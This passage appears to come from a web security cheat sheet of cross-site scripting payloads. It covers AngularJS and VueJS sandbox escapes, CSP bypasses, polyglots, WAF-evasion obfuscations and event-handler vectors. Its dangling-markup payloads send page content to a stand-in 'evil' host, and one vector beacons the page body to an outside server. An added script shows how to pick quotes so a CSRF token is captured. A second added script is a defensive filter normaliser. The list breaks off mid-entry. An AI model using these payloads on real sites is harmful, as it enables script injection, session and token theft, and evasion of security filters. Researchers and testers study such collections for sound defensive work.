SVG script with unicode escapes and HTML encoding (decodes to \u0061\u006c\u0065\u0072\u0074(1)): <svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
Client-side template injection

VueJS reflected
Version | Author | Length | Vector
All versions | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
All versions | Mario Heiderich (Cure53), Sebastian Lekies (Google), Eduardo Vela Nava (Google), Krzysztof Kotowicz (Google) | 62 | <div v-html="''.constructor.constructor('alert(1)')()">a</div>
All versions | Gareth Heyes (PortSwigger) | 39 | <x v-html=_c.constructor('alert(1)')()>
All versions | Peter af Geijerstam (Swedish Shellcode Factory) | 37 | <x v-if=_c.constructor('alert(1)')()>

AngularJS sandbox escapes, reflected
Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
1.0.1 - 1.1.5 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}
1.2.0 - 1.2.1 | Jan Horn (Google) | 122 | {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1.2.2 - 1.2.5 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.2.6 - 1.2.18 | Jan Horn (Google) | 106 | {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 124 | {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1.2.24 - 1.2.29 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.3.0 | Gábor Molnár (Google) | 272 | {{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )))}}
1.3.3 - 1.3.18 | Gareth Heyes (PortSwigger) | 128 | {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}
1.3.19 | Gareth Heyes (PortSwigger) | 102 | {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}
1.3.20 | Gareth Heyes (PortSwigger) | 65 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9 | Gareth Heyes (PortSwigger) | 74 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8 | Ian Hickey & Gareth Heyes (PortSwigger) | 79 | {{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}
1.5.9 - 1.5.11 | Jan Horn (Google) | 517 | {{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c.$apply=$apply;c.$eval=b;op=$root.$$phase; $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression'; astNode.operator='(window.X?void0:(window.X=true,alert(1)))+'; astNode.argument={type:'Identifier',name:'foo'}; "); m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a; }}
>=1.6.0 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
>=1.6.0 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}

DOM based AngularJS sandbox escapes (using orderBy or no $eval)
Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.2.0 - 1.2.18 | Jan Horn (Google) | 118 | a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 119 | toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)
1.2.24 - 1.2.26 | Gareth Heyes (PortSwigger) | 317 | {}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 20 | )))alert(1)
1.4.0 - 1.4.5 | Gareth Heyes (PortSwigger) | 75 | 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
>=1.6.0 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.4.4 (without strings) | Gareth Heyes (PortSwigger) | 134 | toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)

AngularJS CSP bypasses
Version | Author | Length | Vector
All versions (Chrome) | Gareth Heyes (PortSwigger) | 81 | <input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
All versions (Chrome), shorter | Gareth Heyes (PortSwigger) | 56 | <input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
All versions (all browsers), shorter | Gareth Heyes (PortSwigger) | 91 | <input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
1.2.0 - 1.5.0 | Eduardo Vela (Google) | 190 | <div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{[1].reduce(value.alert, 1)}}</div></div></div>
All versions (Chrome), shorter via oncut | Savan Gadhiya (NotSoSecure) | 49 | <input ng-cut=$event.path|orderBy:'(y=alert)(1)'>
Scriptless attacks

Dangling markup
Background attribute: <body background="//evil? <table background="//evil? <table><thead background="//evil? <table><tbody background="//evil? <table><tfoot background="//evil? <table><td background="//evil? <table><th background="//evil?
Link href stylesheet: <link rel=stylesheet href="//evil?
Link href icon: <link rel=icon href="//evil?
Meta refresh: <meta http-equiv="refresh" content="0; http://evil?
Img to pass markup through src attribute: <img src="//evil? <image src="//evil?
Video using track element: <video><track default src="//evil?
Video using source element and src attribute: <video><source src="//evil?
Audio using source element and src attribute: <audio><source src="//evil?
Input src: <input type=image src="//evil?
Button using formaction: <form><button style="width:100%;height:100%" type=submit formaction="//evil?
Input using formaction: <form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?
Form using action: <button form=x style="width:100%;height:100%;"><form id=x action="//evil?
Object data: <object data="//evil?
Iframe src: <iframe src="//evil?
Embed src: <embed src="//evil?
Embed src, unquoted: <embed src=//evil?
Use textarea to consume markup and post to an external site: <form><button formaction=//evil>XSS</button><textarea name=x>
Pass markup data through window.name using form target: <button form=x>XSS</button><form id=x action=//evil target='
Pass markup data through window.name using base target: <a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="
Pass markup data through window.name using formtarget: <form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="
Using base href to pass data: <a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/
Using embed window name to pass data from the page: <embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using iframe window name to pass data from the page: <iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using object window name to pass data from the page: <object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using frame window name to pass data from the page: <frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Overwrite type attribute with image in hidden inputs: <input type=hidden type=image src="//evil?
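Every dangling-markup vector above is the same trick: an attribute value is opened and never closed, so the tokenizer keeps reading the page's own HTML (including any anti-CSRF token that follows) into the value until it meets the matching quote, and that value then leaves the page as a URL, a form field or window.name. The following JavaScript is an added example, not part of the cheat sheet: it simulates the relevant tokenizer states on a constructed page with a token after the injection point, shows why the choice of quote decides how much is captured, and applies the heuristic Chrome uses against this class of attack (a resource request is blocked when its URL contains both a raw newline and a "<"), which explains why the textarea and window.name variants above still work there. The page, the token value and the evil host are constructed for this example.

```javascript
// Added example, not part of the cheat sheet: what an unclosed attribute swallows, and
// which exfiltration channels survive Chrome's dangling-markup check. PAGE, the token
// and the "evil" host are constructed placeholders.
const PAGE = `<p>Hello, INJECT</p>
<form action="/transfer" method="post">
  <input type="hidden" name="csrf" value="a1b2c3d4-secret">
  <button>Send</button>
</form>`;

function inject(page, payload) {
  return page.replace('INJECT', payload);
}

// Tokenizer "attribute value (quoted) state": the value runs to the next matching quote,
// across newlines and tags. The quote the payload opened with decides which one ends it.
function leakedAttributeValue(page, payload) {
  const quote = /=(["'])[^"']*$/.exec(payload)[1];
  const html = inject(page, payload);
  const valueStart = html.indexOf(payload) + payload.lastIndexOf(quote) + 1;
  const close = html.indexOf(quote, valueStart);
  return html.slice(valueStart, close === -1 ? html.length : close);
}

// <textarea> switches the tokenizer to RCDATA state: only "</textarea" ends it, so the
// page's own quotes no longer matter, and the text leaves as a form field, not a URL.
function leakedTextareaBody(page, payload) {
  const html = inject(page, payload);
  const bodyStart = html.indexOf(payload) + payload.length;
  const close = html.indexOf('</textarea', bodyStart);
  return html.slice(bodyStart, close === -1 ? html.length : close);
}

// Chrome's dangling-markup mitigation: a resource request is blocked when its URL still
// contains both a raw newline and a '<'. Swallowed HTML nearly always contains both.
function blockedByChromeDanglingMarkupCheck(url) {
  return url.includes('\n') && url.includes('<');
}

const TOKEN = 'a1b2c3d4-secret';

function demo() {
  const dq = leakedAttributeValue(PAGE, '<img src="//evil?');
  const sq = leakedAttributeValue(PAGE, "<img src='//evil?");
  const ta = leakedTextareaBody(PAGE, '<form action=//evil><button>X</button><textarea name=x>');
  return {
    // Double quote: capture stops at the page's first `"` (action="), before the token.
    doubleQuoted: { leaked: dq, hasToken: dq.includes(TOKEN), blocked: blockedByChromeDanglingMarkupCheck(dq) },
    // Single quote: the page has none, so the value runs to the end and includes the token.
    singleQuoted: { leaked: sq, hasToken: sq.includes(TOKEN), blocked: blockedByChromeDanglingMarkupCheck(sq) },
    // Textarea: the token is in the POST body, so the URL heuristic never sees it.
    textarea: { leaked: ta, hasToken: ta.includes(TOKEN), blocked: false },
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Two practical points fall out of running it. First, pick the quote character that does not appear between the injection point and the secret; on a template that double-quotes every attribute, the single-quoted payload captures the whole rest of the document. Second, the URL heuristic only covers channels that put the captured text in a URL, which is why the cheat sheet lists the textarea, form target and window.name variants separately.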
Polyglots
Polyglot payload 1: javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Polyglot payload 2: javascript:"/*\"/*`/*' /*--></noscript></title></textarea></style></template></noembed></script><html onmouseover=/*&lt;svg/*/onload=alert()//>
Polyglot payload 3: javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/PortSwiggerRes/)//'>
WAF bypass: global objects
Each vector below indexes a global object with a computed property name so that the strings alert, document and domain never appear verbatim. window is shown; the same payload works with self, this, top, parent, frames or globalThis in its place.
XSS into a JavaScript string, string concatenation: window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, comment syntax: window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, hex escape sequence: window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence and base64 encoded string (eval(alert(atob('WFNT'))), WFNT is "XSS"): window['\x65\x76\x61\x6c'](window['\x61\x6c\x65\x72\x74'](window['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, octal escape sequence: window['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, unicode escape: window['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, RegExp source property: window[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, Hieroglyphy/JSFuck: window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
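A WAF rule that matches the literal text "alert" or "document" is beaten by every row above, because the property name only exists after the JavaScript engine decodes the string literal or concatenates its pieces. The following JavaScript is an added example, not part of the cheat sheet: it is a small normaliser that resolves the computed-member forms used above (string escapes in hex, octal and unicode, block comments, "+" concatenation, RegExp.source) back to the plain identifier, so a filter can match on what the code means rather than on what it says. It covers exactly the tricks in the table; the Hieroglyphy/JSFuck form needs real evaluation and is reported as unresolved rather than guessed. The alias list, the set of sensitive names and the sample inputs are constructed for this example.

```javascript
// Added example, not part of the cheat sheet: resolve obfuscated GLOBAL[...] property
// names back to the identifier they select, for a filter that matches on meaning.
const GLOBAL_ALIASES = ['window', 'self', 'this', 'top', 'parent', 'frames', 'globalThis'];

// Decode the escapes a JS string literal may contain: \xHH, \uHHHH, \u{H...}, octal \NNN
// and the single-character escapes (\n, \t, \', \" and so on).
function decodeJsStringBody(body) {
  return body.replace(
    /\\(?:x([0-9a-fA-F]{2})|u\{([0-9a-fA-F]+)\}|u([0-9a-fA-F]{4})|([0-7]{1,3})|(.))/g,
    (_, hex2, braced, hex4, octal, ch) => {
      if (hex2) return String.fromCharCode(parseInt(hex2, 16));
      if (braced) return String.fromCodePoint(parseInt(braced, 16));
      if (hex4) return String.fromCharCode(parseInt(hex4, 16));
      if (octal) return String.fromCharCode(parseInt(octal, 8));
      return { n: '\n', t: '\t', r: '\r', b: '\b', f: '\f', v: '\v' }[ch] ?? ch;
    },
  );
}

// Evaluate a property-name expression built only from string literals, RegExp .source
// and '+', with /* */ comments removed. Anything else (an identifier, a call, JSFuck
// arithmetic) cannot be resolved statically here and yields null.
function resolvePropertyName(expr) {
  const src = expr.replace(/\/\*[\s\S]*?\*\//g, '').trim();
  const token = /'((?:[^'\\]|\\.)*)'|"((?:[^"\\]|\\.)*)"|\/((?:[^\/\\]|\\.)+)\/\.source/y;
  const glue = /\s*(?:\+\s*)?/y;   // optional '+' between pieces; always matches
  const parts = [];
  let pos = 0;
  while (pos < src.length) {
    token.lastIndex = pos;
    const m = token.exec(src);
    if (!m) return null;
    // /al/.source is the pattern text itself; string literals are decoded first.
    parts.push(m[3] !== undefined ? m[3] : decodeJsStringBody(m[1] !== undefined ? m[1] : m[2]));
    glue.lastIndex = token.lastIndex;
    glue.exec(src);
    pos = glue.lastIndex;
  }
  return parts.join('');
}

// Find GLOBAL[ ... ] accesses and resolve each index. One level of nested brackets is
// tolerated inside the index; deeper nesting (JSFuck) ends the match early and resolves
// to null, which is reported rather than silently dropped.
function findComputedGlobalAccesses(code) {
  const re = new RegExp(`\\b(${GLOBAL_ALIASES.join('|')})\\[((?:[^\\[\\]]|\\[[^\\]]*\\])*)\\]`, 'g');
  const hits = [];
  for (let m; (m = re.exec(code)) !== null;) {
    hits.push({ global: m[1], index: m[2], name: resolvePropertyName(m[2]) });
  }
  return hits;
}

// Names worth blocking when reached through a computed index (a constructed list).
const SUSPICIOUS = new Set(['eval', 'alert', 'Function', 'atob', 'document', 'location', 'setTimeout', 'fetch']);

// Returns "global[name]" for each resolved sensitive name, and "global[?]" for an index
// the resolver could not evaluate, so that unresolvable obfuscation is still flagged.
function suspiciousNames(code) {
  return findComputedGlobalAccesses(code)
    .filter((h) => h.name === null || SUSPICIOUS.has(h.name))
    .map((h) => `${h.global}[${h.name === null ? '?' : h.name}]`);
}

// Constructed inputs: the vectors from the table above with different global aliases.
const SAMPLES = [
  String.raw`window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])`,
  String.raw`self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])`,
  String.raw`top['\x65\x76\x61\x6c'](top['\x61\x6c\x65\x72\x74'](top['\x61\x74\x6f\x62']('WFNT')))`,
  String.raw`parent['\141\154\145\162\164']('\130\123\123')`,
  String.raw`frames['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')`,
  String.raw`globalThis[/al/.source+/ert/.source](/XSS/.source)`,
  String.raw`this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])`,
];

for (const s of SAMPLES) console.log(suspiciousNames(s).join(' '), '<=', s);
```

The design choice is to fail closed: an index that the resolver cannot reduce to a string is reported as "?" instead of being ignored, because in a JavaScript string context there is no legitimate reason for `window[...]` to carry an arithmetic expression. Deciding whether such a hit is a block or a review item is a policy question for the WAF operator.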
Impossible labs
Title | Description | Length limit | Closest vector
Basic context, WAF blocks <[a-zA-Z] | This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour and it's only known to be exploitable in old IE with <%tag. | N/A | N/A
Script based injection, but quotes, forward slash and backslash are escaped | We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block. The closest we've got to solving this is when you have multiple injection points: the first within a script based context and the second in HTML. | N/A | N/A
innerHTML context, but no equals allowed | You have a site that processes the query string and URL decodes the parameters, but splits on the equals, then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event. | N/A | N/A
Basic context, length limit | This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters, <q/oncut=alert``, but can you beat it? | 15 | <q oncut=alert``
Attribute context, length limit | The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters, oncut=alert``+ (the plus is a trailing space). Do you think you can beat it? | 14 | oncut=alert`` (plus a trailing space)
Basic context, length limit, arbitrary code | It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code. | 19 | <q oncut=eval(name)
Attribute context, length limit, arbitrary code | Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript. | 17 | See link
Injection occurs inside a frameset but before the body | We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy. | N/A | N/A
Injection occurs inside a single quoted string, only the characters a-z0-9+` are allowed | The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`. | N/A | N/A

Classic vectors (XSS crypt)
Image src with JavaScript protocol: <img src="javascript:alert(1)">
Body background with JavaScript protocol: <body background="javascript:alert(1)">
Iframe data URLs no longer work, as modern browsers give the framed document a null origin: <iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
VBScript protocol used to work in IE: <a href="vbscript:MsgBox+1">XSS</a> <a href="#" onclick="vbs:Msgbox+1">XSS</a> <a href="#" onclick="VBS:Msgbox+1">XSS</a> <a href="#" onclick="vbscript:Msgbox+1">XSS</a> <a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a> <a href="#" language="vbs" onclick="vbscript:Msgbox+1">XSS</a>
JScript compact was a minimal version of JS that wasn't widely used in IE: <a href="#" onclick="jscript.compact:alert(1);">test</a> <a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>
JScript.Encode allows encoded JavaScript: <a href="#" language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a> <a href="#" onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
VBScript.Encode allows encoded VBScript: <iframe onload="VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@"> <iframe language="VBScript.Encode" onload="#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">
JavaScript entities used to work in Netscape Navigator: <a title="&{alert(1)}">XSS</a>
JavaScript stylesheets used to be supported by Netscape Navigator: <link href="xss.js" rel="stylesheet" type="text/javascript">
Button used to consume markup: <form><button name=x formaction=x><b>stealme
IE9 select elements and plaintext used to consume markup: <form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
XBL, Firefox 2 and earlier: <div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> (a second variant differs only in CSS backslash escapes that the extraction dropped) <div style="-moz-bindin\67:url(//businessinfo.co.uk/lab\ s/xbl/xbl.xml#xss)"> <div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/lab\ s/xbl/xbl.xml#xss)">
XBL also worked in Firefox 3.5 using data URLs: <img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)" />
CSS expressions, IE7 and earlier: <div style="xss:expression(alert(1))"> <div style="xss:expression(1)-alert(1)"> <div style="xss:expressio\6e(alert(1))"> <div style="xss:expressio\006e(alert(1))"> <div style="xss:expressio\00006e(alert(1))"> <div style="xss:expressio\6e(alert(1))"> <div style="xss:expressio&#x5c;6e(alert(1))">
In quirks mode IE allowed you to use = instead of the colon: <div style="xss=expression(alert(1))"> <div style="color&#x3d;red">test</div>
Behaviors for older modes of IE: <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>
Older versions of IE supported event handlers in functions: <script> function window.onload() { alert(1) } </script> <script> function window::onload() { alert(1) } </script> <script> function window.location() { } </script> <body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML() { } </script> </body> <body> <script> function document.body.innerHTML() { x = '<img src=1 onerror=alert(1)>' } </script> </body>
GreyMagic HTML+TIME exploit (no longer works, even in IE5 docmode): <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>
Firefox allows NULs after & (a NUL byte directly after the ampersand; the extraction dropped it): <a href="javascript:&#x6a;avascript:alert(1)">Firefox</a>
Firefox allows NULs inside named entities (a NUL byte inside the entity name; the extraction dropped it): <a href="javascript&colon;alert(1)">Firefox</a>
Firefox allows NUL characters inside opening comments (NUL bytes between the dashes of the opening comment; the extraction dropped them): <!-- ><img title="--><iframe/onload=alert(1)>"> -->
Safari used to allow any tag to have an onload event inside SVG: <svg><xss onload=alert(1)>
Isindex using src attribute: <isindex type=image src="//evil?
Isindex using submit: <isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?
Isindex and formaction: <isindex type=submit formaction=javascript:alert(1)>
Isindex and action: <isindex type=submit action=javascript:alert(1)>
Credits
Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.
This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C., gadhiyasavan, p4fg, diofeher.
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.
ondragover
Triggered dragging over an element
<div draggable=true contenteditable>drag me</div><xss ondragover=alert(1) contenteditable>drop here</xss>
ondragstart
Requires a mouse drag
<xss draggable=true ondragstart=alert(1)>test</xss>
ondrop
Triggered dropping a draggable element
<div draggable=true contenteditable>drag me</div><xss ondrop=alert(1) contenteditable>drop here</xss>
onfullscreenchange
Fires when a video changes full screen status
<video onfullscreenchange=alert(1) src=validvideo.mp4 controls>
oninput
Requires a change of value
<input oninput=alert(1) value=xss>
oninvalid
Requires a form submission with an element that does not satisfy its constraints, such as a required attribute
<form><input oninvalid=alert(1) required><input type=submit>
onkeydown
Triggered when a key is pressed
<xss onkeydown=alert(1) contenteditable>test</xss>
onkeypress
Triggered when a key is pressed
<xss onkeypress=alert(1) contenteditable>test</xss>
onkeyup
Triggered when a key is released
<xss onkeyup=alert(1) contenteditable>test</xss>
onmousedown
Triggered when the mouse button is pressed
<xss onmousedown=alert(1)>test</xss>
onmouseenter
Triggered when the mouse is hovered over the element
<xss onmouseenter=alert(1)>test</xss>
onmouseleave
Triggered when the mouse is moved away from the element
<xss onmouseleave=alert(1)>test</xss>
onmousemove
Requires mouse movement
<xss onmousemove=alert(1)>test</xss>
onmouseout
Triggered when the mouse is moved away from the element
<xss onmouseout=alert(1)>test</xss>
onmouseover
Requires a hover over the element
<xss onmouseover=alert(1)>test</xss>
onmouseup
Triggered when the mouse button is released
<xss onmouseup=alert(1)>test</xss>
onmousewheel
Fires when the mouse wheel scrolls
<xss onmousewheel=alert(1)>requires scrolling
onmozfullscreenchange
Fires when a video changes full screen status (Firefox prefixed name)
<video onmozfullscreenchange=alert(1) src=validvideo.mp4 controls>
onpagehide
Fires when the page is navigated away from
<body onpagehide=navigator.sendBeacon('https://ssl.portswigger-labs.net/',document.body.innerHTML)>
onpaste
Requires you to paste a piece of text
<a onpaste=alert(1) contenteditable>test</a>
onpause
Requires clicking the element to pause
<audio autoplay controls onpause=alert(1)><source src=validaudio.wav type=audio/wav></audio>
onpointerdown
Fires on pointer (mouse) down
<xss onpointerdown=alert(1)>XSS</xss>
onpointerenter
Fires when the pointer enters the element
<xss onpointerenter=alert(1)>XSS</xss>
onpointerleave
Fires when the pointer leaves the element
<xss onpointerleave=alert(1)>XSS</xss>
onpointermove
Fires when the pointer moves
<xss onpointermove=alert(1)>XSS</xss>
onpointerout
Fires when the pointer moves out of the element
<xss onpointerout=alert(1)>XSS</xss>
onpointerover
Fires when the pointer moves over the element
<xss onpointerover=alert(1)>XSS</xss>
onpointerrawupdate
Fires when the pointer changes
<xss onpointerrawupdate=alert(1)>XSS</xss>
onpointerup
Fires on pointer (mouse) up
<xss onpointerup=alert(1)>XSS</xss>
onreset
Requires a click
<form onreset=alert(1)><input type=reset>
onsearch
Fires when a form is submitted and the input has a type attribute of search
<form><input type=search onsearch=alert(1) value="Hit return" autofocus>
onseeked
Requires clicking the element timeline
<audio autoplay controls onseeked=alert(1)><source src=validaudio.wav type=audio/wav></audio>
onseeking
Requires clicking the element timeline
<audio autoplay controls onseeking=alert(1)><source src=validaudio.wav type=audio/wav></audio>
onselect
Requires you to select text
<input onselect=alert(1) value=XSS autofocus>
onselectionchange
Fires when the text selection is changed on the page
<body onselectionchange=alert(1)>select some text
onselectstart
Fires when beginning a text selection
<body onselectstart=alert(1)>select some text
onshow
Fires when the context menu is shown
<div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>
onsubmit
Requires a form submission
<form onsubmit=alert(1)><input type=submit>
ontouchend
Fires when a touch on the screen ends (mobile devices only)
<body ontouchend=alert(1)>
ontouchmove
Fires when a touch moves across the screen (mobile devices only)
<body ontouchmove=alert(1)>
ontouchstart
Fires when the screen is touched (mobile devices only)
<body ontouchstart=alert(1)>
onvolumechange
Requires volume adjustment
<audio autoplay controls onvolumechange=alert(1)><source src=validaudio.wav type=audio/wav></audio>
onwheel
Fires when you use the mouse wheel
<body onwheel=alert(1)>
Restricted characters
No parentheses, using exception handling
<script>onerror=alert;throw 1</script>
No parentheses, using exception handling, no semicolons
<script>{onerror=alert}throw 1</script>
No parentheses, using exception handling, no semicolons, using expressions
<script>throw onerror=alert,1</script>
No parentheses, using exception handling and eval
<script>throw onerror=eval,'=alert\x281\x29'</script>
No parentheses, using exception handling and eval on Firefox
<script>onerror=eval;throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
No parentheses, using ES6 hasInstance and instanceof with eval
